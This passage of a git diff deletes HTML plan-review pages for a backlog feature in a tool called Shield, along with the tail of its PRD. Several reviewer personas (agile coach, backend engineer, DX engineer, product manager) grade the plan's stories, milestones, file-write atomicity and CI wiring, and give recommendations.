  • Manual remove: /backlog supports explicitly removing an entry — for ideas decided against, or any entry not cleared by a promotion run (e.g. captured-then-abandoned). Removal is a plain delete; no retained history in v1.
  • -
-

Still open

-
    -
  • Feature/epic discovery cost. Epics live inside per-feature plan.json, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged plan.json files; add a project-level epic index only if this gets slow.)
  • -
  • Dropped/rejected entries. Do we need an explicit terminal state for "decided against," or is deleting the entry enough? (Deferred — see §11 Out of scope.)
  • -
-

10. Risks & assumptions

-

Risks

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
RiskMitigationOwner
Backlog becomes a graveyard (captured, never acted on)Reconciliation prunes plan-committed work on /backlog view; periodic audit surfaces stale entries; §7 counter-metric tracks it@ashwinimanoj
Concurrent writes corrupt backlog.json (capture racing reconciliation)Atomic write (temp-then-rename); validate-or-refuse on read; backlog.json is git-tracked so corruption is revertable@ashwinimanoj
Reconciliation wrongly removes an entry (epic-name collision / ambiguous match)Match on feature + epic only; never remove on ambiguity (entry stays); git revert recovers any bad removal@ashwinimanoj
Capture friction too high → nobody capturesSingle-step capture; agent can capture without prompting@ashwinimanoj
-

Assumptions

-
    -
  • (unvalidated) Agents reliably surface follow-up work conversationally — the entire no-hooks non-goal (§6) rests on this. Revisit if discovered work is still being lost after v1.
  • -
  • (unvalidated) The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own backlog.json history will validate it.
  • -
  • (assumed stable) Epic names in plan.json are stable enough to serve as the proposed-new-epic match key (see §9).
  • -
  • (validated) manifest.json is feature-keyed and plan.json carries epics[].stories[] — confirmed against the current schema.
  • -
-

11. Out of scope / Non-goals

-
    -
  • Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).
  • -
  • Per-feature backlogs and a global↔per-feature promotion path.
  • -
  • An audit trail / retained history for removed or declined entries (manual remove is a plain delete in v1 — the entry is gone, with no kept record).
  • -
  • /pm-sync of backlog entries to the PM tool before promotion.
  • -
  • Cross-project / multi-repo backlogs.
  • -
  • Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).
  • -
-
-
-

This is a lean PRD. It intentionally omits the following standard sections:

-
    -
  • Section 8 — User stories & scenarios
  • -
  • Section 9 — Functional requirements
  • -
  • Section 10 — Non-functional requirements
  • -
  • Section 11 — RBAC & permissions matrix
  • -
  • Section 12 — Dependencies
  • -
  • Section 13 — Risks & mitigations
  • -
  • Section 14 — Assumptions
  • -
  • Section 15 — Rollout plan (full — lean has its own §8 Milestones)
  • -
  • Section 16 — Cost & resource impact
  • -
  • Section 17 — GTM & customer-comms
  • -
  • Section 18 — Support / CX impact
  • -
-

If scope grows or stakeholders need more detail, run /prd again — Shield -will offer to add specific sections or upgrade to standard.

-
- -
-
Generated by Shield
- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html deleted file mode 100644 index fa041797..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html +++ /dev/null @@ -1,308 +0,0 @@ - - - - - -Shield Plan Review - - - -
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

Agile Coach — Detailed Findings

-
-

Back to summary

-
-

Agile Coach Review (Grade: B)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#Evaluation PointGradeNotes
AC1Story sizingATen stories, each a coherent single-sprint unit. Schema+validator, capture, view, remove, status badges, association+suggestion, promotion, reconciliation engine, triggers, evals, release each scoped to days not weeks. None trivial, none multi-week. EPIC-3-S2 (reconciliation engine) is the heaviest but still one focused unit.
AC2Story independenceBGood parallelism within M1 (S1 schema unblocks S2/S3/S4; S3 view and S4 remove can proceed in parallel once helper exists). EPIC-3-S3 hard-depends on EPIC-3-S2 (shared engine) and EPIC-3-S1 (transient reference) — correctly sequenced but tightly coupled; that coupling is inherent, not a defect.
AC3Dependency orderingAMilestone chain M1→M2→M3 is explicit and acyclic. Blockers are stated: EPIC-3-S3 "share the reconciliation engine" depends on EPIC-3-S2; promotion (S1) precedes eager prune (S3); EPIC-2-S1 view-badges build on EPIC-1-S3 view (called out: "Pipeline status badges are added in EPIC-2-S1"). No circular deps.
AC4Context completenessAEvery story's description states why it exists, not just what. E.g. EPIC-1-S2 ties to a corruption-race rationale and explicitly "resolves the PRD-review P1 'capture interface undefined'"; EPIC-2-S1 explains the goal ("show 'prd done, not yet planned' without being removed"). Carried-forward PRD-review items mapped to stories.
AC5Requirements clarityBMostly specific and measurable: named validator errors (unknown_kind_enum, missing_required_field, schema_version_too_new), explicit field list, atomic temp-then-rename. Weaker spot: EPIC-2-S2 "propose the best match" leaves the matching algorithm undefined (no string-distance/heuristic spec) — deferred to a TODO LLD epic-suggester. AC6/AC7 partly compensate but the "best match" criterion is not measurable.
AC6Implementation step qualityBSteps say what and mostly how (e.g. "write backlog.json.tmp then rename; on failure remove .tmp", "pydantic + jsonschema, run via uv"). Verification is largely pushed into the AC rather than into the steps themselves; e.g. EPIC-3-S2 steps describe behavior but no in-step verification checkpoint. Solid but not exemplary.
AC7Acceptance criteria testabilityBMost AC are pass/fail verifiable by a third party (exit 0/non-zero with named error; "killing capture mid-write leaves no corrupted backlog.json"; "second pass is a no-op"). Two soft spots: EPIC-2-S2 "proposes ≥1 feature and ≥1 epic candidate when matches exist" — the "best match" quality isn't asserted; EPIC-3-S3 "before the next /backlog view" is a sequencing claim that's awkward to test deterministically. No vague "performance is good"-style criteria.
AC8Sprint-readinessBM1 and M3 stories are pullable as-is. EPIC-2-S2 carries an open design question (suggestion match algorithm, TODO /lld epic-suggester) and PRD §9 flags "Feature/epic discovery cost" as still-open — a dev would need a planning conversation on the matching heuristic before estimating S2 confidently. Everything else is ready.
AC9Estimation feasibilityBEight of ten stories are confidently estimable. EPIC-2-S2 (undefined match heuristic) and EPIC-3-S2 (match-key + drift-tolerance edge space) carry estimation uncertainty until the LLDs land. All LLD design_refs are unresolved TODO links — fine for a plan, but they're the exact detail an estimator wants.
AC10Definition of Done alignmentBStrong on tests (dedicated EPIC-4-S1 eval story with RED→GREEN, CI wiring, self-contained no-LLM fixtures) and docs (EPIC-4-S2: command + SKILL + CHANGELOG) and release (version bump per CLAUDE.md). Not stated anywhere: code review and deploy/ship-to-staging steps in the DoD. For a plugin-asset repo "staging" maps loosely to the marketplace bump, but review is unmentioned.
AC13Milestone coverageAAll three milestones have covering stories. M1: EPIC-1-S1/S2/S3/S4 + EPIC-2-S1 (5). M2: EPIC-2-S2 (1). M3: EPIC-3-S1/S2/S3 + EPIC-4-S1/S2 (5). No empty milestone.
AC14Milestone reference integrityAEvery story milestone_id is M1, M2, or M3 — all present in milestones[]. No null, no dangling reference. milestones[] non-empty.
AC15Milestone exit criteria testabilityBMost exit criteria are testable facts (validator exits 0/non-zero with named error; atomic temp-then-rename; "a prd-only feature is NOT removed"; "second pass is idempotent"). M2's "proposes ≥1 candidate ... using a documented match" leans on an undocumented match (mirrors the EPIC-2-S2 AC5/AC8 gap). M1's "renders ... a research/prd/plan status read from manifest.json" is verifiable. Overall testable with one soft item.
AC16Milestone DAG integrityAGraph: M1→(M2), M2→(M3). Linear, acyclic, fully connected. No cycle, no dangling depends_on (M1 deps [], M2 deps [M1], M3 deps [M2]).
-

Key Finding: A well-structured, sprint-ready backlog with an acyclic milestone DAG and full coverage; the single recurring weakness is the undefined feature/epic suggestion-matching heuristic (EPIC-2-S2 / M2), which is still an open question and undercuts requirements clarity, sprint-readiness, and estimability for that one story.

-

Story-Level Assessment

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
StorySizingHas ContextHas RequirementsHas StepsHas CriteriaSprint-Ready?
EPIC-1-S1 · Schema + validatorOKYesYesYesYesYes
EPIC-1-S2 · Capture (user+skill) atomic writeOKYesYesYesYesYes
EPIC-1-S3 · /backlog ordered viewOKYesYesYesYesYes
EPIC-1-S4 · Manual removeOKYesYesYesYesYes
EPIC-2-S1 · Pipeline status from manifestOKYesYesYesYesYes
EPIC-2-S2 · Feature+epic association + suggestionOKYesPartial (match heuristic undefined)PartialPartial ("best match" not asserted)No
EPIC-3-S1 · Promotion (transient reference)OKYesYesYesYesYes
EPIC-3-S2 · Reconciliation engineOKYesYesYesYesYes
EPIC-3-S3 · Eager + lazy triggers (idempotent)OKYesYesYesYesYes
EPIC-4-S1 · Executable evals (RED→GREEN)OKYesYesYesYesYes
EPIC-4-S2 · Version bump + docsOKYesYesYesYesYes
-

Milestone-Level Assessment

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
MilestoneHas Covering StoriesExit Criteria TestableDepends-On Valid
M1 · Capture + store + viewYes (5: E1-S1..S4, E2-S1)YesYes (root, deps [])
M2 · Feature + epic association + suggestionYes (1: E2-S2)Partial ("documented match" undefined)Yes (deps M1)
M3 · Promotion + reconciliationYes (5: E3-S1..S3, E4-S1, E4-S2)YesYes (deps M2)
-

Note on milestone/epic phase alignment: EPIC-2-S1 carries milestone_id: M1 while sitting in EPIC-2 ("Association & pipeline status"). This is intentional and correct, not a conflict — the story implements the manifest status badge, which M1's outcome explicitly includes ("/backlog renders the ordered list ... with per-entry pipeline status from manifest.json"). The epic groups by theme; the milestone groups by ship-phase. They legitimately cross here. No remediation needed.

-

Recommendations

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P1AC5 / AC7 / AC8 (EPIC-2-S2)Define the feature/epic suggestion match heuristic before the story enters a sprint — specify the matching method (e.g. case-insensitive substring + token-overlap ranking on feature/epic names) and add a measurable AC such as "given fixture manifest with feature auth, capturing text mentioning 'auth' surfaces auth as the top candidate." Resolve the PRD §9 open "Feature/epic discovery cost" question or land the TODO /lld epic-suggester so S2 is estimable.
P2AC15 (M2)Tighten M2's exit criterion "using a documented match" — point it at the resolved heuristic above and restate as a testable fact, mirroring the M3 exit criteria's precision.
P2AC10Add code-review and ship/staging steps to the implied Definition of Done. EPIC-4-S2 covers version bump + docs + CHANGELOG; add "PR reviewed and merged; marketplace version published" as an explicit DoD line so 'done' is unambiguous across the team.
P2AC9The LLD design_refs for EPIC-1-S1, EPIC-1-S2, EPIC-2-S2, EPIC-3-S2, EPIC-3-S3 are all unresolved TODO links. Land (or stub) /lld backlog-store, /lld epic-suggester, and /lld reconciler before sprint start so estimators have the interface-level detail those stories reference.
-

Overall Persona Grade: B (point average ≈ 3.36 across 14 evaluation points — six A, eight B — rounds to B). The plan is sprint-ready with strong context, an acyclic and fully-covered milestone DAG, and testable criteria throughout. The one consistent drag is the under-specified suggestion-matching in EPIC-2-S2 / M2, which a single planning clarification (P1) would lift to A-range.

- - - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html deleted file mode 100644 index 234e66d5..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html +++ /dev/null @@ -1,113 +0,0 @@ - - - - - -Shield Plan Review - - - -
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

Backend Engineer — Detailed Findings

-
-

Back to summary

-
-

Backend Reviewer — Plan Review: Shield Backlog

-

Scope: plan.md, trd.md, plan.json (4 epics / 11 stories / 3 milestones), grounded against shield/schema/plan-sidecar.schema.json and docs/shield/manifest.json. -Stack: Python (uv), JSON-schema deliverables, command/skill markdown. No framework skills apply.

-

Scorecard

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#Evaluation PointGradeBasis
1Data contract / schema designBbacklog.json contract is fully specified (§11, F1, EPIC-1-S1): {schema_version:int, entries:[{id, order:int, kind, source, feature, epic, text}]}, draft-2020-12, named errors. Gap: id has no type/format/uniqueness rule, and the id generation strategy is undefined (see P1-a). epic/feature typed only as bare strings with no "proposed-new vs existing" discriminator.
2API / interface designCThe skill-facing write-helper — explicitly the carried-forward PRD-review P1 — is still open (Q3: "exact function signature / module location … Resolution: lock in /lld backlog-store or at EPIC-1-S2 implementation"). §11 describes it only as "documented function/contract taking {text, kind, feature?, epic?, source}; returns the created entry id." Deferring the signature of the one cross-skill contract to implementation time is the central interface risk (P1-b).
3File I/O correctness & atomicity (N1)BStrong: temp-then-rename + validate-or-refuse, crash leaves at most .tmp cleaned next run, git-tracked recoverability (N1, N4, EPIC-1-S2). Gaps: (a) no fsync/os.replace durability detail — "rename" on POSIX via os.replace is atomic but the plan doesn't name the primitive; (b) no concurrency primitive named — N1 claims "concurrent capture racing reconciliation must never corrupt" but temp-then-rename alone does not prevent lost updates (two writers each read-modify-rename → last-writer-wins drops an entry). No lock/CAS/re-read-under-lock mentioned (P1-c).
4Error handlingAConsistently specified: named validator errors (unknown_kind_enum, missing_required_field, schema_version_too_new), absent-id no-op, empty-backlog message, malformed-upstream → entry-stays-with-log, never-crash (N3, F5, §9). Degradation paths are explicit and testable.
5Testing strategyAEPIC-4-S1 mandates self-contained executable evals (no API/LLM) under shield/evals/, named fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays), RED→GREEN in PR, CI gate. Directly satisfies CLAUDE.md eval mandate. One missing case: no eval for the lost-update concurrency path (ties to P1-c) and none for schema_version_too_new migration.
6Framework / idiom fitACorrect for the repo: uv-run scripts, pydantic+jsonschema, schema at shield/schema/, skill at shield/skills/general/backlog/, command at shield/commands/, version bump in marketplace.json + pyproject (EPIC-4-S2). Matches existing validate_*/reconcile_* script conventions.
-

Schema-grounding check (read-contract, N3 / §11): I verified the consumed shapes against the live files. manifest.json is features[].{name, artifacts.{research,prd,plan_json,...}}§11 is accurate. plan-sidecar.schema.json has epics[].{id (^EPIC-[0-9]+$), name, stories[]} with story.status ∈ {ready,in-progress,in-review,done,blocked}§11's epics[].{id,name,stories[]} is accurate. The read-contract claim is correct, which lifts N3 from a guess to a verified coupling. Good.

-
-

Prioritized Recommendations

-

P1 — Important gaps (C/incomplete on important points):

-
    -
  • -

    P1-a · id contract underspecified (Eval point 1). F1 / §11 / the schema task list id as a required field but never define its type, format, or how it's generated. Manual-remove (/backlog remove <id>), promotion (promote <id>), and eager-prune all key off id, yet uniqueness and collision behavior are unstated. Action: in EPIC-1-S1, specify id type (string?), generation (uuid4 / monotonic / slug), and a uniqueness constraint in the schema. Add an AC: "schema rejects duplicate id."

    -
  • -
  • -

    P1-b · Write-helper signature still open is a P0-shaped risk parked as Q3 (EvalPoint 2). This is the exact PRD-review P1 the plan claims to resolve in EPIC-1-S2, but §11 + Q3 punt the signature to "/lld or implementation." Since EPIC-1-S2 is the contract every capturing skill builds against, an unspecified signature means downstream skills can't be written or tested against a stable shape. Action: lock the helper signature (name, module path, params, return, raise-on-invalid behavior) in EPIC-1-S1/S2 acceptance criteria — not deferred to LLD. At minimum pin: capture(text, *, kind="task", feature=None, epic=None, source) -> entry_id and where it lives (shield/scripts/backlog_store.py?).

    -
  • -
  • -

    P1-c · Atomicity ≠ isolation; lost-update path unaddressed (EvalPoint 3, N1). N1's threat model is "concurrent capture racing reconciliation." Temp-then-rename guarantees no torn file, but two concurrent read-modify-write cycles still silently drop one writer's entry (both read N entries, each writes N+1, second rename wins → one entry lost, no corruption flagged). The plan treats "no corruption" as equivalent to "no data loss." Action: name the concurrency strategy — single-writer assumption documented as such, OR a lockfile / re-read-and-merge under exclusive open / O_EXCL temp. Add an eval fixture for two interleaved captures. If single-actor is the real assumption (N5 says "single actor"), state it explicitly in N1 and downgrade the "racing reconciliation" language, because eager-prune-at-end-of-/plan can genuinely run while an agent captures.

    -
  • -
-

P2 — Warnings / minor gaps on B items:

-
    -
  • -

    P2-a · "Epic landed" gate is ambiguous (EvalPoint 1/5, F7). F7 says remove "when its epic's work appears in the feature's plan.json," EPIC-3-S2 AC says "whose epic's stories appear," but the schema guarantees an epic always has stories[] (minItems:1) the moment it's written. So "stories appear" = "epic exists" — meaning an entry is pruned as soon as /plan writes the epic, regardless of whether any story is done. That may be intended (plan-committed = removed) but it's stated three slightly different ways. Action: state the gate as one precise predicate, e.g. "epic with matching id/name is present in plan.json.epics[]" — and explicitly note story status is not consulted. Removes reviewer ambiguity and pins the eval assertion.

    -
  • -
  • -

    P2-b · Proposed-new "match by epic name" fragility is acknowledged but not bounded (EvalPoint 2). Match key for proposed-new epics is epic name with "names expected stable" as an unvalidated assumption (PRD §10). The mitigation (§14: "disable eager prune on repeated name collisions") is reactive. Action: add normalization rules to EPIC-3-S2 (case/whitespace-insensitive? exact?) and an AC for the collision case ("two epics same normalized name → ambiguous → entry stays"), which the "ambiguous-stays" fixture should already exercise — wire it explicitly to name-collision, not just structural ambiguity.

    -
  • -
  • -

    P2-c · schema_version migration is policy-only, no executable path (EvalPoint 1/5). The read-old/write-new policy is documented but EPIC-1-S1 only validates schema_version_too_new (reject). There's no migration function or eval for read-old. Acceptable for v1 (only one version exists), but the AC overstates ("migration policy present" = a doc, not code). Action: either add a no-op migrate(doc)->doc seam now with a test, or explicitly scope migration as doc-only-until-v2 in the AC so it isn't mistaken for working code.

    -
  • -
-
-

Overall Persona Grade: B (3.0)

-

Average of point grades: (B + C + B + A + A + A) = (3+2+3+4+4+4)/6 = 3.33 → B.

-

The plan is well-grounded — the reconciliation read-contract is verified accurate against the live schemas (not assumed), error handling and testing strategy are A-grade, and the atomic-write framing is sound. It is held back from A by two important, named-but-unresolved interface/correctness gaps: the skill-facing write-helper signature is still open (Q3) despite being the headline PRD-review carry-forward, and N1 conflates atomicity with isolation, leaving the lost-update path under a "single actor" assumption that isn't stated where the threat is described. Resolve P1-b (lock the helper signature in EPIC-1-S1/S2 ACs) and P1-c (name the concurrency strategy + add the interleaved-capture eval) and this is an A.

- - - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html deleted file mode 100644 index fe94b8ff..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html +++ /dev/null @@ -1,172 +0,0 @@ - - - - - -Shield Plan Review - - - -
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

DX Engineer — Detailed Findings

-
-

Back to summary

-
-

DX Engineer Review (Grade: B)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#Evaluation PointGradeNotes
DX1Plan clarityAplan.md line 6 states the goal in one sentence; TRD §2 problem statement is crisp. 30-second comprehension easily met.
DX2Story actionabilityBAll 10 stories carry tasks + AC + design_refs and reference concrete files (shield/schema/backlog.schema.json, shield/scripts/reconcile_backlog.py). EPIC-1-S2 is the weak point: the skill write-helper signature is explicitly deferred (TRD §12 Q3) — a dev cannot finalize that interface without the LLD that doesn't exist yet.
DX3Implementation step detailBStrong for backend tooling: names files, the validator stack (pydantic + jsonschema, run via uv), named error codes (unknown_kind_enum, schema_version_too_new), JSON Schema draft (2020-12). Gaps: "wire into CI" (EPIC-4-S1) and "render a badge line" give what, not how (no CI file path, no badge-format spec beyond an example).
DX4Ambiguity auditBMostly tight. Lingering vague terms: "names expected stable" / "assumed stable" (EPIC-3-S2) is an unverified assumption baked into the match key; "best match" (EPIC-2-S2 task) and "the candidate plan.json" (plan.md L56) are undefined — no matching algorithm or tie-break rule is specified.
DX5Context sufficiencyATRD §11 documents the consumed read-contract, §8 records 4 rejected alternatives with rationale, §13 links prior art, PRD §2 is a glossary. A new dev has the background to start. Verified against repo: referenced shapes and dirs exist.
DX6Dependency clarityBMilestone deps are explicit (M1→M2→M3) and stories carry milestone_id. Gap: no story-level dependency graph — e.g. EPIC-3-S3 (triggers) clearly depends on EPIC-3-S2 (engine) and EPIC-3-S1 (transient reference), but that ordering is implied, not stated. EPIC-2-S1 is tagged M1 while sitting in EPIC-2 (M2), which is correct but easy to miss without an explicit note.
DX7Tool & access requirementsBuv is named as the runner; no credentials/accounts needed (local file, single actor — TRD §9 "Secrets/auth: none"). Not called out per-story, but the no-access nature is explicit, so the gap is low-impact.
DX8Handoff readinessBLargely self-contained — a dev with no Slack context could start M1 today. Two handoff blockers: (1) the capture-helper signature deferred to a non-existent LLD; (2) three design_refs point to LLD components marked TODO: link when /lld <x> lands (backlog-store, epic-suggester, reconciler) — those links resolve to nothing today, so the deepest design detail for the hardest stories (reconciler) is not yet in any document.
DX9Service boundariesAClean separation: backlog_store owns atomic R/W + validation; reconcile_backlog is the single shared engine both triggers call (TRD §7, EPIC-3-S3 AC "Eager and lazy paths call the same reconciliation engine"). manifest = index, plan.json = gate is a clear, well-named ownership split. No ambiguous shared state — backlog.json has one writer path.
DX10API & data flow designAThe backlog.json document contract is fully specified (TRD §11, F1, schema story). The consumed read-contract (manifest features[].artifacts, plan.json epics[].stories[]) is documented and I verified it matches the real manifest. Data flow diagrammed in TRD §7 and PRD §5 mermaid. Only soft spot: the skill write-helper return/signature (the one true "API" here) is deferred — counted under DX2/DX8.
DX11Deployment strategyBFor a plugin this means release/rollback, and it is addressed: TRD §14 rollback (git revert of git-tracked backlog.json, "not invoking /backlog is a complete disable"), staged safety (destructive reconciliation lands last in M3), and a documented fallback trigger (disable eager prune → manual-only). No phased rollout beyond milestone ordering, which is acceptable for internal tooling.
DX12CI/CD integrationCEPIC-4-S1 says "wire into CI" and "CI runs the eval on PRs touching the backlog assets" but names no workflow file, no existing CI entrypoint (e.g. which of run-eval.sh/run-evals.sh), and no path-filter mechanism. The repo has an eval runner convention the story should point at. This is the least-specified mechanical step.
DX13Error handling patternsAFailure modes are enumerated and given concrete strategies: never-remove-on-doubt (F7, N3), atomic temp-then-rename + validate-or-refuse (N1), crash-mid-write leaves at most a .tmp cleaned next run, malformed/old upstream shapes → entry stays + logged warning (not exception), absent-id → clear no-op. This is the plan's strongest dimension.
DX14Configuration managementBoutput_dir from .shield.json{output_dir}/backlog.json (TRD §9). schema_version migration policy (read-old/write-new) is documented. No feature flags (none needed for staged-by-milestone rollout) and no secrets (none exist). Adequate for scope; not called out per-story.
DX15Developer onboardingBBacklog SKILL.md is a deliverable (EPIC-1-S3, EPIC-4-S2) documenting capture/view/promote/remove + 3 triggers + match key. Gap: no local-dev/debugging guidance for the eval suite or how to run the validator/reconciler against a fixture during development — the "run it locally" loop is implied by uv run but not spelled out.
-

Key Finding: This is a clear, architecturally sound, error-handling-first plan with verified prior art — but three design_refs point to LLD docs that don't exist yet (backlog-store, epic-suggester, reconciler) and the skill capture-helper signature is explicitly deferred, so the two hardest stories (capture interface, reconciler) are not yet fully handoff-ready.

-

Recommendations

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P1DX8 / DX2Resolve TRD §12 Q3 before EPIC-1-S2 starts: add the skill write-helper signature (module location, parameter names/types for {text, kind, feature?, epic?, source}, return type = created entry id) to TRD §11 inline, OR commit to running /lld backlog-store first and mark EPIC-1-S2 blocked-on-LLD. Today the three design_refs reading TODO: link when /lld <x> lands resolve to nothing.
P1DX4In EPIC-2-S2 and EPIC-3-S2, replace "best match" / "names expected stable" with a concrete matching algorithm: define the feature-name and epic-name match (exact? case-insensitive? normalized?), the tie-break/ambiguity rule that triggers "entry stays", and what happens on epic-name rename. The match key is the core of reconciliation and is currently underspecified.
P2DX12In EPIC-4-S1, name the CI entrypoint and path filter explicitly: which runner (shield/evals/run-evals.sh vs run-eval.sh), the workflow file to edit, and the glob that scopes "backlog assets" (e.g. shield/{schema,scripts,skills/general/backlog}/**). "Wire into CI" is not actionable without it.
P2DX6Add an explicit intra-epic story dependency note for EPIC-3: S1 (transient reference) and S2 (engine) must land before S3 (triggers consume both). Currently only milestone-level deps are stated.
P2DX3 / DX15Specify the badge render format once (EPIC-2-S1 shows 'research ✓ prd ✓ plan –' as an example only) and add a one-line local-dev loop to the backlog SKILL.md deliverable (e.g. uv run shield/scripts/reconcile_backlog.py <fixture> to dry-run reconciliation).
-

Overall persona grade: B (point average ≈ 3.4: eleven A/B-strong points; DX12 is the lone C; no Critical point graded below B, so no P0).

- - - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html deleted file mode 100644 index f2ae956d..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html +++ /dev/null @@ -1,196 +0,0 @@ - - - - - -Shield Plan Review - - - -
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

Product Manager — Detailed Findings

-
-

Back to summary

-
-

The PM persona is decomposed into 10 focused dimension subagents (PM1–PM10), each -returning a single-check JSON result. They are rolled up here under the PM persona.

-

Persona grade: A — dim average = (4+4+4+4+3+4+4+4+4+2)/10 = 3.7 → A.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
DimNameGradeSeverity
PM1User impact clarityACritical
PM2Problem-solution fitACritical
PM3Scope discipline (plan)AImportant
PM4Prioritization rationaleAImportant
PM5Stakeholder communicabilityBImportant
PM6Market / competitive awarenessAWarning
PM7Adoption & rollout riskAImportant
PM8Success metricsAImportant
PM9Reversibility & exit costAWarning
PM10Business value alignmentCCritical
-
-

PM1 — User impact clarity — A (Critical)

-
{
-  "id": "PM1", "name": "User impact clarity", "persona": "product-manager",
-  "grade": "A", "severity": "Critical",
-  "evidence_quote": "| P1 | Ashwini — Shield maintainer running `/research`/`/plan`/`/implement` daily | Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next | Future ideas get lost or derail the current task; no ordered \"later\" list at the project level |",
-  "gap": null, "suggestion": null
-}
-
-

PRD §4 names personas P1 (Ashwini) and P2 (the agent) with concrete goals and frictions; §7 quantifies impact via success metrics.

-

PM2 — Problem-solution fit — A (Critical)

-
{
-  "id": "PM2", "name": "Problem-solution fit", "persona": "product-manager",
-  "grade": "A", "severity": "Critical",
-  "evidence_quote": "Today there is **nowhere to park that work**. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.",
-  "gap": null, "suggestion": null
-}
-
-

Every capability maps one-to-one onto the stated problem (store → "nowhere to park", capture → agent-discovered-work gap, ordered list → "what next", promotion+reconciliation → "loose idea to plan"). Problem-first ordering holds; scope creep fenced in §6 non-goals.

-

PM3 — Scope discipline (plan) — A (Important)

-
{
-  "id": "PM3", "name": "Scope discipline (plan)", "persona": "product-manager",
-  "grade": "A", "severity": "Important",
-  "evidence_quote": "Out of scope:\n- Per-feature backlogs; PM-tool sync of un-promoted entries; a rejected/dropped audit trail; cross-project backlogs; priority buckets; end-of-task surfacing hooks. (See PRD §6/§11.)",
-  "gap": null, "suggestion": null
-}
-
-

MVP-shaped: TRD §3 Out of scope, PRD §6/§11 non-goals with rationale, lean PRD omits 11 standard sections by design, staged milestones, §8 alternatives reject heavier designs (A3 lifecycle engine, A4 hook reconciliation).

-

PM4 — Prioritization rationale — A (Important)

-
{
-  "id": "PM4", "name": "Prioritization rationale", "persona": "product-manager",
-  "grade": "A", "severity": "Important",
-  "evidence_quote": "**Staged safety:** M1 ships read/append + manual remove only; the destructive automatic reconciliation lands last (M3), so the risky path is introduced after the store is proven.",
-  "gap": null, "suggestion": null
-}
-
-

Explicit depends_on chain M1→M2→M3, per-story priority labels, and a staged-safety sequencing rationale in TRD §14.

-

PM5 — Stakeholder communicability — B (Important)

-
{
-  "id": "PM5", "name": "Stakeholder communicability", "persona": "product-manager",
-  "grade": "B", "severity": "Important",
-  "evidence_quote": "Future work surfaces constantly while using Shield — during `/research`, while writing a PRD, mid-`/plan`, and especially during `/implement` (\"we should also handle X later\", \"this whole area needs a rewrite\"). Today there is **nowhere to park that work**.",
-  "gap": "The plain-language WHAT/WHY lives only in the PRD; the TRD §1 overview and plan.md (the artifacts a reviewer hits first) lead with Shield-internal filesystem and pipeline jargon (manifest.json, reconciliation, eager/lazy prune) without a reader-facing summary.",
-  "suggestion": "Add a two-to-three-sentence plain-language executive summary at the top of trd.md and plan.md that states what is being built and why before the schema- and pipeline-heavy detail."
-}
-
-

PM6 — Market / competitive awareness — A (Warning)

-
{
-  "id": "PM6", "name": "Market / competitive awareness", "persona": "product-manager",
-  "grade": "A", "severity": "Warning",
-  "evidence_quote": "**A1. Stamp a `backlog_id` onto the promoted story in `plan.json`** (id-based reconciliation). Rejected: re-introduces a synthetic id and writes into `plan.json`; the feature(manifest)+epic(plan) match key reconciles with no stamping.",
-  "gap": null, "suggestion": null
-}
-
-

TRD §8 names four alternatives (A1–A4) with rejection rationale; PRD §6/§11 positions vs the incumbent PM tool's own backlog and the do-nothing baseline.

-

PM7 — Adoption & rollout risk — A (Important)

-
{
-  "id": "PM7", "name": "Adoption & rollout risk", "persona": "product-manager",
-  "grade": "A", "severity": "Important",
-  "evidence_quote": "Capture friction too high → nobody captures | Single-step capture; agent can capture without prompting | @ashwinimanoj",
-  "gap": null, "suggestion": null
-}
-
-

